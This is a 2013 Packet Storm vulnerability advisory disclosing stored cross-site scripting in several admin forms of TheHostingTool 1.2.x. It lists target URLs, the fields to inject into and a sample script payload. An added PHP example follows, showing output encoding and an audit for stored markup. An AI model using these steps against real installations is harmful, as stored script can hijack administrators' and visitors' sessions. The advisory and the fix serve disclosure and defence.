TheHostingTool 1.2.x Cross Site Scripting

2013-12-08T00:00:00
ID PACKETSTORM:124333
Type packetstorm
Reporter DevilScreaM
Modified 2013-12-08T00:00:00

Description

                                        
`#Title : TheHostingTool 1.2.x Multiple Cross Site Scripting  
  
#Author : DevilScreaM  
  
#Date : 7 December 2013  
  
#Category : Web Applications  
  
#Vendor : http://thehostingtool.com/  
  
#Version : 1.2.x  
  
#Type : PHP  
  
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security  
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber  
  
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |  
  
#Tested : Mozilla, Chrome, Opera -> Windows & Linux  
  
#Vulnerability : Cross Site Scripting  
  
  
POC & Exploit  
  
XSS 1  
  
http://127.0.0.1/admin/?page=servers&sub=add  
  
In the "Name" field, input your XSS  
  
View your XSS at  
  
http://127.0.0.1/admin/?page=servers&sub=view  
http://127.0.0.1/admin/?page=servers&sub=test  
  
  
XSS 2  
  
http://127.0.0.1/admin/?page=staff&sub=add  
  
In the "Username" field, input your XSS  
  
View your XSS at  
  
http://127.0.0.1/admin/?page=staff&sub=edit  
  
  
XSS 3  
  
1. Create a category at http://127.0.0.1/admin/?page=kb&sub=cat  
  
2. After creating the category, create an article at http://127.0.0.1/admin/?page=kb&sub=art  
  
3. In the "Name" or "Article Name" field, input your XSS  
  
Example <script>alert('DevilScreaM')</script>  
  
4. View your XSS at  
  
http://127.0.0.1/support/  
`
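Added example, not part of the original advisory and not TheHostingTool's own code: the three issues above share one pattern, a value saved through an admin form and later written into another page without encoding. The sketch below puts the vulnerable output pattern beside an output-encoded one and adds a heuristic audit of already-stored values; the function names and the sample rows are hypothetical and constructed for illustration.

```php
<?php
// Added example: hypothetical helpers, not TheHostingTool's own code.

// Constructed sample rows standing in for stored records. The 'field'
// labels are the admin form fields named in the advisory.
$rows = [
    ['field' => 'servers: Name',    'value' => 'web01'],
    ['field' => 'staff: Username',  'value' => "<script>alert('DevilScreaM')</script>"],
    ['field' => 'kb: Article Name', 'value' => 'Billing & invoices'],
];

// Vulnerable pattern: the stored value is concatenated into HTML as-is,
// so markup in the value becomes markup in the page.
function render_cell_unsafe(string $value): string
{
    return '<td>' . $value . '</td>';
}

// Hardened pattern: encode at output time for the HTML context.
// ENT_QUOTES also covers values that end up inside quoted attributes.
function render_cell(string $value): string
{
    $encoded = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<td>' . $encoded . '</td>';
}

// Heuristic audit: list fields whose stored value contains tag-like
// markup, so records written before the fix can be reviewed by hand.
function audit_rows(array $rows): array
{
    $flagged = [];
    foreach ($rows as $row) {
        if (preg_match('/<\s*\/?\s*[a-z!]/i', $row['value']) === 1) {
            $flagged[] = $row['field'];
        }
    }
    return $flagged;
}

foreach ($rows as $row) {
    // Print the encoded form; the unsafe form is kept only for comparison.
    echo render_cell($row['value']), PHP_EOL;
}
echo 'Fields to review: ', implode(', ', audit_rows($rows)), PHP_EOL;
```

Encoding belongs on every page that displays the value (the view, test, edit and support pages listed above), since a single unencoded sink is enough for the stored payload to run.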